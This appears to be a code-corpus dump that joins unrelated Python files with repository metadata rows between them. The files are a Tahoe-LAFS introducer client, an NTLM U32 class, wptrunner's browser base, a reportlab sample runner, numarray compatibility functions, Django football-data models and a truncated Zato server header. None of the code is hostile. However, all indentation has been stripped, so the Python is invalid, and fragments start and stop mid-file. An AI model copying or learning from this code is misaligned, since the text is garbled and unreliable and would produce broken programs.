d.addCallback(_publish_stub_client)
return d
def create_announcement_dict(self, service_name, ann):
ann_d = { "version": 0,
# "seqnum" and "nonce" will be populated with new values in
# publish(), each time we make a change
"nickname": self._nickname,
"app-versions": self._app_versions,
"my-version": self._my_version,
"oldest-supported": self._oldest_supported,
"service-name": service_name,
}
ann_d.update(ann)
return ann_d
def publish(self, service_name, ann, signing_key=None):
# we increment the seqnum every time we publish something new
current_seqnum, current_nonce = self._sequencer()
ann_d = self.create_announcement_dict(service_name, ann)
self._outbound_announcements[service_name] = ann_d
# publish all announcements with the new seqnum and nonce
for service_name,ann_d in self._outbound_announcements.items():
ann_d["seqnum"] = current_seqnum
ann_d["nonce"] = current_nonce
ann_t = sign_to_foolscap(ann_d, signing_key)
self._published_announcements[service_name] = ann_t
self._maybe_publish()
def _maybe_publish(self):
if not self._publisher:
self.log("want to publish, but no introducer yet", level=log.NOISY)
return
# this re-publishes everything. The Introducer ignores duplicates
for ann_t in self._published_announcements.values():
self._debug_counts["outbound_message"] += 1
if V2 in self._publisher.version:
self._debug_outstanding += 1
d = self._publisher.callRemote("publish_v2", ann_t,
self._canary)
d.addBoth(self._debug_retired)
else:
d = self._handle_v1_publisher(ann_t) # for_v1
d.addErrback(log.err, ann_t=ann_t,
facility="tahoe.introducer.client",
level=log.WEIRD, umid="xs9pVQ")
def _handle_v1_publisher(self, ann_t): # for_v1
# they don't speak V2, so fall back to the old 'publish' method
# (which takes an unsigned tuple of bytestrings)
self.log("falling back to publish_v1",
level=log.UNUSUAL, umid="9RCT1A")
ann_v1 = convert_announcement_v2_to_v1(ann_t)
self._debug_outstanding += 1
d = self._publisher.callRemote("publish", ann_v1)
d.addBoth(self._debug_retired)
return d
def remote_announce_v2(self, announcements):
lp = self.log("received %d announcements (v2)" % len(announcements))
return self.got_announcements(announcements, lp)
def got_announcements(self, announcements, lp=None):
# this is the common entry point for both v1 and v2 announcements
self._debug_counts["inbound_message"] += 1
for ann_t in announcements:
try:
# this might raise UnknownKeyError or bad-sig error
ann, key_s = unsign_from_foolscap(ann_t)
# key is "v0-base32abc123"
except BadSignatureError:
self.log("bad signature on inbound announcement: %s" % (ann_t,),
parent=lp, level=log.WEIRD, umid="ZAU15Q")
# process other announcements that arrived with the bad one
continue
self._process_announcement(ann, key_s)
def _process_announcement(self, ann, key_s):
self._debug_counts["inbound_announcement"] += 1
service_name = str(ann["service-name"])
if service_name not in self._subscribed_service_names:
self.log("announcement for a service we don't care about [%s]"
% (service_name,), level=log.UNUSUAL, umid="dIpGNA")
self._debug_counts["wrong_service"] += 1
return
# for ASCII values, simplejson might give us unicode *or* bytes
if "nickname" in ann and isinstance(ann["nickname"], str):
ann["nickname"] = unicode(ann["nickname"])
nick_s = ann.get("nickname",u"").encode("utf-8")
lp2 = self.log(format="announcement for nickname '%(nick)s', service=%(svc)s: %(ann)s",
nick=nick_s, svc=service_name, ann=ann, umid="BoKEag")
# how do we describe this node in the logs?
desc_bits = []
if key_s:
desc_bits.append("serverid=" + key_s[:20])
if "anonymous-storage-FURL" in ann:
tubid_s = get_tubid_string_from_ann(ann)
desc_bits.append("tubid=" + tubid_s[:8])
description = "/".join(desc_bits)
# the index is used to track duplicates
index = make_index(ann, key_s)
# is this announcement a duplicate?
if (index in self._inbound_announcements
and self._inbound_announcements[index][0] == ann):
self.log(format="reannouncement for [%(service)s]:%(description)s, ignoring",
service=service_name, description=description,
parent=lp2, level=log.UNUSUAL, umid="B1MIdA")
self._debug_counts["duplicate_announcement"] += 1
return
# does it update an existing one?
if index in self._inbound_announcements:
old,_,_ = self._inbound_announcements[index]
if "seqnum" in old:
# must beat previous sequence number to replace
if ("seqnum" not in ann
or not isinstance(ann["seqnum"], (int,long))):
self.log("not replacing old announcement, no valid seqnum: %s"
% (ann,),
parent=lp2, level=log.NOISY, umid="zFGH3Q")
return
if ann["seqnum"] <= old["seqnum"]:
# note that exact replays are caught earlier, by
# comparing the entire signed announcement.
self.log("not replacing old announcement, "
"new seqnum is too old (%s <= %s) "
"(replay attack?): %s"
% (ann["seqnum"], old["seqnum"], ann),
parent=lp2, level=log.UNUSUAL, umid="JAAAoQ")
return
# ok, seqnum is newer, allow replacement
self._debug_counts["update"] += 1
self.log("replacing old announcement: %s" % (ann,),
parent=lp2, level=log.NOISY, umid="wxwgIQ")
else:
self._debug_counts["new_announcement"] += 1
self.log("new announcement[%s]" % service_name,
parent=lp2, level=log.NOISY)
self._inbound_announcements[index] = (ann, key_s, time.time())
# note: we never forget an index, but we might update its value
for (service_name2,cb,args,kwargs) in self._local_subscribers:
if service_name2 == service_name:
eventually(cb, key_s, ann, *args, **kwargs)
def remote_set_encoding_parameters(self, parameters):
self.encoding_parameters = parameters
def connected_to_introducer(self):
return bool(self._publisher)
| gpl-2.0 | 4,940,367,147,178,672,000 | 43.925208 | 95 | 0.591072 | false |
DShokes/ArcREST | src/arcrest/packages/ntlm3/U32.py | 6 | 3652 | # This file is part of 'NTLM Authorization Proxy Server' http://sourceforge.net/projects/ntlmaps/
# Copyright 2001 Dmitry A. Rozmanov <[email protected]>
#
# This library is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library. If not, see <http://www.gnu.org/licenses/> or <http://www.gnu.org/licenses/lgpl.txt>.
from __future__ import division
from .. import six
C = 0x1000000000
def norm(n):
return n & 0xFFFFFFFF
class U32:
v = 0
def __init__(self, value=0):
if not isinstance(value, six.integer_types):
value = six.byte2int(value)
self.v = C + norm(abs(int(value)))
def set(self, value=0):
self.v = C + norm(abs(int(value)))
def __repr__(self):
return hex(norm(self.v))
def __long__(self):
return int(norm(self.v))
def __int__(self):
return int(norm(self.v))
def __chr__(self):
return chr(norm(self.v))
def __add__(self, b):
r = U32()
r.v = C + norm(self.v + b.v)
return r
def __sub__(self, b):
r = U32()
if self.v < b.v:
r.v = C + norm(0x100000000 - (b.v - self.v))
else:
r.v = C + norm(self.v - b.v)
return r
def __mul__(self, b):
r = U32()
r.v = C + norm(self.v * b.v)
return r
def __div__(self, b):
r = U32()
r.v = C + (norm(self.v) // norm(b.v))
return r
def __truediv__(self, b):
r = U32()
r.v = C + (norm(self.v) / norm(b.v))
return r
def __mod__(self, b):
r = U32()
r.v = C + (norm(self.v) % norm(b.v))
return r
def __neg__(self):
return U32(self.v)
def __pos__(self):
return U32(self.v)
def __abs__(self):
return U32(self.v)
def __invert__(self):
r = U32()
r.v = C + norm(~self.v)
return r
def __lshift__(self, b):
r = U32()
r.v = C + norm(self.v << b)
return r
def __rshift__(self, b):
r = U32()
r.v = C + (norm(self.v) >> b)
return r
def __and__(self, b):
r = U32()
r.v = C + norm(self.v & b.v)
return r
def __or__(self, b):
r = U32()
r.v = C + norm(self.v | b.v)
return r
def __xor__(self, b):
r = U32()
r.v = C + norm(self.v ^ b.v)
return r
def __not__(self):
return U32(not norm(self.v))
def truth(self):
return norm(self.v)
def __cmp__(self, b):
if norm(self.v) > norm(b.v):
return 1
elif norm(self.v) < norm(b.v):
return -1
else:
return 0
def __lt__(self, other):
return self.v < other.v
def __gt__(self, other):
return self.v > other.v
def __eq__(self, other):
return self.v == other.v
def __le__(self, other):
return self.v <= other.v
def __ge__(self, other):
return self.v >= other.v
def __ne__(self, other):
return self.v != other.v
def __nonzero__(self):
return norm(self.v)
| apache-2.0 | 2,199,663,836,172,812,800 | 22.410256 | 121 | 0.517251 | false |
pyfisch/servo | tests/wpt/web-platform-tests/tools/wptrunner/wptrunner/browsers/base.py | 4 | 5262 | import os
import platform
import socket
from abc import ABCMeta, abstractmethod
from copy import deepcopy
from ..wptcommandline import require_arg # noqa: F401
here = os.path.split(__file__)[0]
def inherit(super_module, child_globals, product_name):
super_wptrunner = super_module.__wptrunner__
child_globals["__wptrunner__"] = child_wptrunner = deepcopy(super_wptrunner)
child_wptrunner["product"] = product_name
for k in ("check_args", "browser", "browser_kwargs", "executor_kwargs",
"env_extras", "env_options", "timeout_multiplier"):
attr = super_wptrunner[k]
child_globals[attr] = getattr(super_module, attr)
for v in super_module.__wptrunner__["executor"].values():
child_globals[v] = getattr(super_module, v)
if "run_info_extras" in super_wptrunner:
attr = super_wptrunner["run_info_extras"]
child_globals[attr] = getattr(super_module, attr)
def cmd_arg(name, value=None):
prefix = "-" if platform.system() == "Windows" else "--"
rv = prefix + name
if value is not None:
rv += "=" + value
return rv
def get_free_port():
"""Get a random unbound port"""
while True:
s = socket.socket()
try:
s.bind(("127.0.0.1", 0))
except socket.error:
continue
else:
return s.getsockname()[1]
finally:
s.close()
def get_timeout_multiplier(test_type, run_info_data, **kwargs):
if kwargs["timeout_multiplier"] is not None:
return kwargs["timeout_multiplier"]
return 1
def browser_command(binary, args, debug_info):
if debug_info:
if debug_info.requiresEscapedArgs:
args = [item.replace("&", "\\&") for item in args]
debug_args = [debug_info.path] + debug_info.args
else:
debug_args = []
command = [binary] + args
return debug_args, command
class BrowserError(Exception):
pass
class Browser(object):
__metaclass__ = ABCMeta
process_cls = None
init_timeout = 30
def __init__(self, logger):
"""Abstract class serving as the basis for Browser implementations.
The Browser is used in the TestRunnerManager to start and stop the browser
process, and to check the state of that process. This class also acts as a
context manager, enabling it to do browser-specific setup at the start of
the testrun and cleanup after the run is complete.
:param logger: Structured logger to use for output.
"""
self.logger = logger
def __enter__(self):
self.setup()
return self
def __exit__(self, *args, **kwargs):
self.cleanup()
def setup(self):
"""Used for browser-specific setup that happens at the start of a test run"""
pass
def settings(self, test):
return {}
@abstractmethod
def start(self, group_metadata, **kwargs):
"""Launch the browser object and get it into a state where is is ready to run tests"""
pass
@abstractmethod
def stop(self, force=False):
"""Stop the running browser process."""
pass
@abstractmethod
def pid(self):
"""pid of the browser process or None if there is no pid"""
pass
@abstractmethod
def is_alive(self):
"""Boolean indicating whether the browser process is still running"""
pass
def setup_ssl(self, hosts):
"""Return a certificate to use for tests requiring ssl that will be trusted by the browser"""
raise NotImplementedError("ssl testing not supported")
def cleanup(self):
"""Browser-specific cleanup that is run after the testrun is finished"""
pass
def executor_browser(self):
"""Returns the ExecutorBrowser subclass for this Browser subclass and the keyword arguments
with which it should be instantiated"""
return ExecutorBrowser, {}
def check_crash(self, process, test):
"""Check if a crash occured and output any useful information to the
log. Returns a boolean indicating whether a crash occured."""
return False
class NullBrowser(Browser):
def __init__(self, logger, **kwargs):
super(NullBrowser, self).__init__(logger)
def start(self, **kwargs):
"""No-op browser to use in scenarios where the TestRunnerManager shouldn't
actually own the browser process (e.g. Servo where we start one browser
per test)"""
pass
def stop(self, force=False):
pass
def pid(self):
return None
def is_alive(self):
return True
def on_output(self, line):
raise NotImplementedError
class ExecutorBrowser(object):
def __init__(self, **kwargs):
"""View of the Browser used by the Executor object.
This is needed because the Executor runs in a child process and
we can't ship Browser instances between processes on Windows.
Typically this will have a few product-specific properties set,
but in some cases it may have more elaborate methods for setting
up the browser from the runner process.
"""
for k, v in kwargs.iteritems():
setattr(self, k, v)
| mpl-2.0 | -1,312,770,853,328,141,800 | 28.071823 | 101 | 0.629038 | false |
nakagami/reportlab | src/reportlab/graphics/samples/runall.py | 1 | 1969 | # runs all the GUIedit charts in this directory -
# makes a PDF sample for eaxh existing chart type
import sys
import glob
import inspect
import types
def moduleClasses(mod):
def P(obj, m=mod.__name__, CT=types.ClassType):
return (type(obj)==CT and obj.__module__==m)
try:
return inspect.getmembers(mod, P)[0][1]
except:
return None
def getclass(f):
return moduleClasses(__import__(f))
def run(format, VERBOSE=0):
formats = format.split(',')
for i in range(0, len(formats)):
formats[i] == formats[i].strip().lower()
allfiles = glob.glob('*.py')
allfiles.sort()
for fn in allfiles:
f = fn.split('.')[0]
c = getclass(f)
if c != None:
print c.__name__
try:
for fmt in formats:
if fmt:
c().save(formats=[fmt],outDir='.',fnRoot=c.__name__)
if VERBOSE:
print " %s.%s" % (c.__name__, fmt)
except:
print " COULDN'T CREATE '%s.%s'!" % (c.__name__, format)
if __name__ == "__main__":
if len(sys.argv) == 1:
run('pdf,pict,png')
else:
try:
if sys.argv[1] == "-h":
print 'usage: runall.py [FORMAT] [-h]'
print ' if format is supplied is should be one or more of pdf,gif,eps,png etc'
print ' if format is missing the following formats are assumed: pdf,pict,png'
print ' -h prints this message'
else:
t = sys.argv[1:]
for f in t:
run(f)
except:
print 'usage: runall.py [FORMAT][-h]'
print ' if format is supplied is should be one or more of pdf,gif,eps,png etc'
print ' if format is missing the following formats are assumed: pdf,pict,png'
print ' -h prints this message'
raise
| bsd-3-clause | -3,195,991,860,190,270,500 | 32.948276 | 96 | 0.503809 | false |
ogrisel/numpy | numpy/numarray/functions.py | 13 | 15986 | from __future__ import division, absolute_import, print_function
# missing Numarray defined names (in from numarray import *)
__all__ = ['asarray', 'ones', 'zeros', 'array', 'where']
__all__ += ['vdot', 'dot', 'matrixmultiply', 'ravel', 'indices',
'arange', 'concatenate', 'all', 'allclose', 'alltrue', 'and_',
'any', 'argmax', 'argmin', 'argsort', 'around', 'array_equal',
'array_equiv', 'arrayrange', 'array_str', 'array_repr',
'array2list', 'average', 'choose', 'CLIP', 'RAISE', 'WRAP',
'clip', 'compress', 'copy', 'copy_reg',
'diagonal', 'divide_remainder', 'e', 'explicit_type', 'pi',
'flush_caches', 'fromfile', 'os', 'sys', 'STRICT',
'SLOPPY', 'WARN', 'EarlyEOFError', 'SizeMismatchError',
'SizeMismatchWarning', 'FileSeekWarning', 'fromstring',
'fromfunction', 'fromlist', 'getShape', 'getTypeObject',
'identity', 'info', 'innerproduct', 'inputarray',
'isBigEndian', 'kroneckerproduct', 'lexsort', 'math',
'operator', 'outerproduct', 'put', 'putmask', 'rank',
'repeat', 'reshape', 'resize', 'round', 'searchsorted',
'shape', 'size', 'sometrue', 'sort', 'swapaxes', 'take',
'tcode', 'tname', 'tensormultiply', 'trace', 'transpose',
'types', 'value', 'cumsum', 'cumproduct', 'nonzero', 'newobj',
'togglebyteorder'
]
import copy
import types
import os
import sys
import math
import operator
import numpy as np
from numpy import dot as matrixmultiply, dot, vdot, ravel, concatenate, all,\
allclose, any, argsort, array_equal, array_equiv,\
array_str, array_repr, CLIP, RAISE, WRAP, clip, concatenate, \
diagonal, e, pi, inner as innerproduct, nonzero, \
outer as outerproduct, kron as kroneckerproduct, lexsort, putmask, rank, \
resize, searchsorted, shape, size, sort, swapaxes, trace, transpose
from numpy.compat import long
from .numerictypes import typefrom
if sys.version_info[0] >= 3:
import copyreg as copy_reg
else:
import copy_reg
isBigEndian = sys.byteorder != 'little'
value = tcode = 'f'
tname = 'Float32'
# If dtype is not None, then it is used
# If type is not None, then it is used
# If typecode is not None then it is used
# If use_default is True, then the default
# data-type is returned if all are None
def type2dtype(typecode, type, dtype, use_default=True):
if dtype is None:
if type is None:
if use_default or typecode is not None:
dtype = np.dtype(typecode)
else:
dtype = np.dtype(type)
if use_default and dtype is None:
dtype = np.dtype('int')
return dtype
def fromfunction(shape, dimensions, type=None, typecode=None, dtype=None):
dtype = type2dtype(typecode, type, dtype, 1)
return np.fromfunction(shape, dimensions, dtype=dtype)
def ones(shape, type=None, typecode=None, dtype=None):
dtype = type2dtype(typecode, type, dtype, 1)
return np.ones(shape, dtype)
def zeros(shape, type=None, typecode=None, dtype=None):
dtype = type2dtype(typecode, type, dtype, 1)
return np.zeros(shape, dtype)
def where(condition, x=None, y=None, out=None):
if x is None and y is None:
arr = np.where(condition)
else:
arr = np.where(condition, x, y)
if out is not None:
out[...] = arr
return out
return arr
def indices(shape, type=None):
return np.indices(shape, type)
def arange(a1, a2=None, stride=1, type=None, shape=None,
typecode=None, dtype=None):
dtype = type2dtype(typecode, type, dtype, 0)
return np.arange(a1, a2, stride, dtype)
arrayrange = arange
def alltrue(x, axis=0):
return np.alltrue(x, axis)
def and_(a, b):
"""Same as a & b
"""
return a & b
def divide_remainder(a, b):
a, b = asarray(a), asarray(b)
return (a/b, a%b)
def around(array, digits=0, output=None):
ret = np.around(array, digits, output)
if output is None:
return ret
return
def array2list(arr):
return arr.tolist()
def choose(selector, population, outarr=None, clipmode=RAISE):
a = np.asarray(selector)
ret = a.choose(population, out=outarr, mode=clipmode)
if outarr is None:
return ret
return
def compress(condition, a, axis=0):
return np.compress(condition, a, axis)
# only returns a view
def explicit_type(a):
x = a.view()
return x
# stub
def flush_caches():
pass
class EarlyEOFError(Exception):
"Raised in fromfile() if EOF unexpectedly occurs."
pass
class SizeMismatchError(Exception):
"Raised in fromfile() if file size does not match shape."
pass
class SizeMismatchWarning(Warning):
"Issued in fromfile() if file size does not match shape."
pass
class FileSeekWarning(Warning):
"Issued in fromfile() if there is unused data and seek() fails"
pass
STRICT, SLOPPY, WARN = list(range(3))
_BLOCKSIZE=1024
# taken and adapted directly from numarray
def fromfile(infile, type=None, shape=None, sizing=STRICT,
typecode=None, dtype=None):
if isinstance(infile, (str, unicode)):
infile = open(infile, 'rb')
dtype = type2dtype(typecode, type, dtype, True)
if shape is None:
shape = (-1,)
if not isinstance(shape, tuple):
shape = (shape,)
if (list(shape).count(-1)>1):
raise ValueError("At most one unspecified dimension in shape")
if -1 not in shape:
if sizing != STRICT:
raise ValueError("sizing must be STRICT if size complete")
arr = np.empty(shape, dtype)
bytesleft=arr.nbytes
bytesread=0
while(bytesleft > _BLOCKSIZE):
data = infile.read(_BLOCKSIZE)
if len(data) != _BLOCKSIZE:
raise EarlyEOFError("Unexpected EOF reading data for size complete array")
arr.data[bytesread:bytesread+_BLOCKSIZE]=data
bytesread += _BLOCKSIZE
bytesleft -= _BLOCKSIZE
if bytesleft > 0:
data = infile.read(bytesleft)
if len(data) != bytesleft:
raise EarlyEOFError("Unexpected EOF reading data for size complete array")
arr.data[bytesread:bytesread+bytesleft]=data
return arr
##shape is incompletely specified
##read until EOF
##implementation 1: naively use memory blocks
##problematic because memory allocation can be double what is
##necessary (!)
##the most common case, namely reading in data from an unchanging
##file whose size may be determined before allocation, should be
##quick -- only one allocation will be needed.
recsize = int(dtype.itemsize * np.product([i for i in shape if i != -1]))
blocksize = max(_BLOCKSIZE//recsize, 1)*recsize
##try to estimate file size
try:
curpos=infile.tell()
infile.seek(0, 2)
endpos=infile.tell()
infile.seek(curpos)
except (AttributeError, IOError):
initsize=blocksize
else:
initsize=max(1, (endpos-curpos)//recsize)*recsize
buf = np.newbuffer(initsize)
bytesread=0
while True:
data=infile.read(blocksize)
if len(data) != blocksize: ##eof
break
##do we have space?
if len(buf) < bytesread+blocksize:
buf=_resizebuf(buf, len(buf)+blocksize)
## or rather a=resizebuf(a,2*len(a)) ?
assert len(buf) >= bytesread+blocksize
buf[bytesread:bytesread+blocksize]=data
bytesread += blocksize
if len(data) % recsize != 0:
if sizing == STRICT:
raise SizeMismatchError("Filesize does not match specified shape")
if sizing == WARN:
_warnings.warn("Filesize does not match specified shape",
SizeMismatchWarning)
try:
infile.seek(-(len(data) % recsize), 1)
except AttributeError:
_warnings.warn("Could not rewind (no seek support)",
FileSeekWarning)
except IOError:
_warnings.warn("Could not rewind (IOError in seek)",
FileSeekWarning)
datasize = (len(data)//recsize) * recsize
if len(buf) != bytesread+datasize:
buf=_resizebuf(buf, bytesread+datasize)
buf[bytesread:bytesread+datasize]=data[:datasize]
##deduce shape from len(buf)
shape = list(shape)
uidx = shape.index(-1)
shape[uidx]=len(buf) // recsize
a = np.ndarray(shape=shape, dtype=type, buffer=buf)
if a.dtype.char == '?':
np.not_equal(a, 0, a)
return a
# this function is referenced in the code above but not defined. adding
# it back. - phensley
def _resizebuf(buf, newsize):
"Return a copy of BUF of size NEWSIZE."
newbuf = np.newbuffer(newsize)
if newsize > len(buf):
newbuf[:len(buf)]=buf
else:
newbuf[:]=buf[:len(newbuf)]
return newbuf
def fromstring(datastring, type=None, shape=None, typecode=None, dtype=None):
dtype = type2dtype(typecode, type, dtype, True)
if shape is None:
count = -1
else:
count = np.product(shape)
res = np.fromstring(datastring, dtype=dtype, count=count)
if shape is not None:
res.shape = shape
return res
# check_overflow is ignored
def fromlist(seq, type=None, shape=None, check_overflow=0, typecode=None, dtype=None):
dtype = type2dtype(typecode, type, dtype, False)
return np.array(seq, dtype)
def array(sequence=None, typecode=None, copy=1, savespace=0,
type=None, shape=None, dtype=None):
dtype = type2dtype(typecode, type, dtype, 0)
if sequence is None:
if shape is None:
return None
if dtype is None:
dtype = 'l'
return np.empty(shape, dtype)
if isinstance(sequence, file):
return fromfile(sequence, dtype=dtype, shape=shape)
if isinstance(sequence, str):
return fromstring(sequence, dtype=dtype, shape=shape)
if isinstance(sequence, buffer):
arr = np.frombuffer(sequence, dtype=dtype)
else:
arr = np.array(sequence, dtype, copy=copy)
if shape is not None:
arr.shape = shape
return arr
def asarray(seq, type=None, typecode=None, dtype=None):
if isinstance(seq, np.ndarray) and type is None and \
typecode is None and dtype is None:
return seq
return array(seq, type=type, typecode=typecode, copy=0, dtype=dtype)
inputarray = asarray
def getTypeObject(sequence, type):
if type is not None:
return type
try:
return typefrom(np.array(sequence))
except:
raise TypeError("Can't determine a reasonable type from sequence")
def getShape(shape, *args):
try:
if shape is () and not args:
return ()
if len(args) > 0:
shape = (shape, ) + args
else:
shape = tuple(shape)
dummy = np.array(shape)
if not issubclass(dummy.dtype.type, np.integer):
raise TypeError
if len(dummy) > np.MAXDIMS:
raise TypeError
except:
raise TypeError("Shape must be a sequence of integers")
return shape
def identity(n, type=None, typecode=None, dtype=None):
dtype = type2dtype(typecode, type, dtype, True)
return np.identity(n, dtype)
def info(obj, output=sys.stdout, numpy=0):
if numpy:
bp = lambda x: x
else:
bp = lambda x: int(x)
cls = getattr(obj, '__class__', type(obj))
if numpy:
nm = getattr(cls, '__name__', cls)
else:
nm = cls
print("class: ", nm, file=output)
print("shape: ", obj.shape, file=output)
strides = obj.strides
print("strides: ", strides, file=output)
if not numpy:
print("byteoffset: 0", file=output)
if len(strides) > 0:
bs = obj.strides[0]
else:
bs = obj.itemsize
print("bytestride: ", bs, file=output)
print("itemsize: ", obj.itemsize, file=output)
print("aligned: ", bp(obj.flags.aligned), file=output)
print("contiguous: ", bp(obj.flags.contiguous), file=output)
if numpy:
print("fortran: ", obj.flags.fortran, file=output)
if not numpy:
print("buffer: ", repr(obj.data), file=output)
if not numpy:
extra = " (DEBUG ONLY)"
tic = "'"
else:
extra = ""
tic = ""
print("data pointer: %s%s" % (hex(obj.ctypes._as_parameter_.value), extra), file=output)
print("byteorder: ", end=' ', file=output)
endian = obj.dtype.byteorder
if endian in ['|', '=']:
print("%s%s%s" % (tic, sys.byteorder, tic), file=output)
byteswap = False
elif endian == '>':
print("%sbig%s" % (tic, tic), file=output)
byteswap = sys.byteorder != "big"
else:
print("%slittle%s" % (tic, tic), file=output)
byteswap = sys.byteorder != "little"
print("byteswap: ", bp(byteswap), file=output)
if not numpy:
print("type: ", typefrom(obj).name, file=output)
else:
print("type: %s" % obj.dtype, file=output)
#clipmode is ignored if axis is not 0 and array is not 1d
def put(array, indices, values, axis=0, clipmode=RAISE):
if not isinstance(array, np.ndarray):
raise TypeError("put only works on subclass of ndarray")
work = asarray(array)
if axis == 0:
if array.ndim == 1:
work.put(indices, values, clipmode)
else:
work[indices] = values
elif isinstance(axis, (int, long, np.integer)):
work = work.swapaxes(0, axis)
work[indices] = values
work = work.swapaxes(0, axis)
else:
def_axes = list(range(work.ndim))
for x in axis:
def_axes.remove(x)
axis = list(axis)+def_axes
work = work.transpose(axis)
work[indices] = values
work = work.transpose(axis)
def repeat(array, repeats, axis=0):
return np.repeat(array, repeats, axis)
def reshape(array, shape, *args):
if len(args) > 0:
shape = (shape,) + args
return np.reshape(array, shape)
import warnings as _warnings
def round(*args, **keys):
_warnings.warn("round() is deprecated. Switch to around()",
DeprecationWarning)
return around(*args, **keys)
def sometrue(array, axis=0):
return np.sometrue(array, axis)
#clipmode is ignored if axis is not an integer
def take(array, indices, axis=0, outarr=None, clipmode=RAISE):
array = np.asarray(array)
if isinstance(axis, (int, long, np.integer)):
res = array.take(indices, axis, outarr, clipmode)
if outarr is None:
return res
return
else:
def_axes = list(range(array.ndim))
for x in axis:
def_axes.remove(x)
axis = list(axis) + def_axes
work = array.transpose(axis)
res = work[indices]
if outarr is None:
return res
outarr[...] = res
return
def tensormultiply(a1, a2):
a1, a2 = np.asarray(a1), np.asarray(a2)
if (a1.shape[-1] != a2.shape[0]):
raise ValueError("Unmatched dimensions")
shape = a1.shape[:-1] + a2.shape[1:]
return np.reshape(dot(np.reshape(a1, (-1, a1.shape[-1])),
np.reshape(a2, (a2.shape[0], -1))),
shape)
def cumsum(a1, axis=0, out=None, type=None, dim=0):
return np.asarray(a1).cumsum(axis, dtype=type, out=out)
def cumproduct(a1, axis=0, out=None, type=None, dim=0):
return np.asarray(a1).cumprod(axis, dtype=type, out=out)
def argmax(x, axis=-1):
return np.argmax(x, axis)
def argmin(x, axis=-1):
return np.argmin(x, axis)
def newobj(self, type):
if type is None:
return np.empty_like(self)
else:
return np.empty(self.shape, type)
def togglebyteorder(self):
self.dtype=self.dtype.newbyteorder()
def average(a, axis=0, weights=None, returned=0):
return np.average(a, axis, weights, returned)
| bsd-3-clause | 7,563,496,858,626,876,000 | 30.972 | 92 | 0.609658 | false |
craiga/openfootydata | models/models.py | 1 | 5396 | from datetime import datetime
from django.db import models
from django.core import validators
import pytz
import timezonefinder
from colorful.fields import RGBColorField
class League(models.Model):
id = models.CharField(max_length=200, primary_key=True, validators=[
validators.MinLengthValidator(1),
validators.RegexValidator(r'^\w+$')
])
name = models.TextField()
def __str__(self):
"""String representation of a league."""
return self.name
class Team(models.Model):
id = models.CharField(max_length=200, primary_key=True, validators=[
validators.MinLengthValidator(1),
validators.RegexValidator(r'^\w+$')
])
league = models.ForeignKey(League, on_delete=models.PROTECT)
name = models.TextField()
primary_colour = RGBColorField(blank=True, null=True)
secondary_colour = RGBColorField(blank=True, null=True)
tertiary_colour = RGBColorField(blank=True, null=True)
def __str__(self):
"""String representation of a team."""
return self.name
class TeamAlternativeName(models.Model):
id = models.AutoField(primary_key=True)
name = models.TextField()
team = models.ForeignKey(Team,
on_delete=models.CASCADE,
related_name='alternative_names')
def __str__(self):
"""String representation of a team's alternative name."""
return '{} (alternative name of {})'.format(self.name, self.team.name)
class Season(models.Model):
id = models.CharField(max_length=200, primary_key=True, validators=[
validators.MinLengthValidator(1),
validators.RegexValidator(r'^\w+$')
])
league = models.ForeignKey(League, on_delete=models.PROTECT)
name = models.TextField()
def __str__(self):
"""String representation of a season."""
return self.name
class Venue(models.Model):
id = models.CharField(max_length=200, primary_key=True, validators=[
validators.MinLengthValidator(1),
validators.RegexValidator(r'^\w+$')
])
name = models.TextField()
latitude = models.DecimalField(max_digits=8,
decimal_places=6,
validators=[
validators.MinValueValidator(-90),
validators.MaxValueValidator(90)])
longitude = models.DecimalField(max_digits=9,
decimal_places=6,
validators=[
validators.MinValueValidator(-180),
validators.MaxValueValidator(180)])
def __str__(self):
"""String representation of a venue."""
return self.name
@property
def timezone(self):
"""Get the timezone of this venue based on its latitude and
longitude.
"""
tf = timezonefinder.TimezoneFinder()
return tf.timezone_at(lat=self.latitude, lng=self.longitude)
class VenueAlternativeName(models.Model):
id = models.AutoField(primary_key=True)
name = models.TextField()
venue = models.ForeignKey(Venue,
on_delete=models.CASCADE,
related_name='alternative_names')
def __str__(self):
"""String representation of a venue's alternative name."""
return '{} (alternative name of {})'.format(self.name, self.venue.name)
class Game(models.Model):
id = models.AutoField(primary_key=True)
start = models.DateTimeField()
season = models.ForeignKey(Season, on_delete=models.PROTECT)
venue = models.ForeignKey(Venue,
on_delete=models.PROTECT,
blank=True,
null=True)
team_1 = models.ForeignKey(Team,
on_delete=models.PROTECT,
related_name='+')
team_1_goals = models.PositiveIntegerField(default=0)
team_1_behinds = models.PositiveIntegerField(default=0)
team_2 = models.ForeignKey(Team,
on_delete=models.PROTECT,
related_name='+')
team_2_goals = models.PositiveIntegerField(default=0)
team_2_behinds = models.PositiveIntegerField(default=0)
class Meta:
unique_together = ('start', 'season', 'team_1', 'team_2')
def __str__(self):
"""String representation of a game."""
now = datetime.now(pytz.utc)
if self.start < now:
return '{} ({}.{} {}) vs. {} ({}.{} {}) at {}'.format(
self.team_1, self.team_1_goals, self.team_1_behinds,
self.team_1_score, self.team_2, self.team_2_goals,
self.team_2_behinds, self.team_2_score,
self.start.strftime('%c'))
else:
return '{} vs. {} at {}'.format(self.team_1,
self.team_2,
self.start.strftime('%c'))
@property
def team_1_score(self):
"""Calculate the score for team_1."""
return self.team_1_goals * 6 + self.team_1_behinds
@property
def team_2_score(self):
"""Calculate the score for team_2."""
return self.team_2_goals * 6 + self.team_2_behinds
| gpl-2.0 | 652,259,131,672,871,200 | 34.973333 | 79 | 0.568199 | false |
AmrnotAmr/zato | code/zato-server/src/zato/server/base/parallel.py | 5 | 40693 | # -*- coding: utf-8 -*-
"""
Copyright (C) 2010 Dariusz Suchojad <dsuch at zato.io>
Licensed under LGPLv3, see LICENSE.txt for terms and conditions.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
# stdlib
import logging, os, time, signal
from datetime import datetime
from httplib import INTERNAL_SERVER_ERROR, responses
from logging import INFO
from tempfile import mkstemp
from threading import Thread
from traceback import format_exc
from uuid import uuid4
# anyjson
from anyjson import dumps
# arrow
from arrow import utcnow
# Bunch
from zato.bunch import Bunch
# gevent
import gevent
import gevent.monkey # Needed for Cassandra
# parse
from parse import compile as parse_compile
# Paste
from paste.util.converters import asbool
# pytz
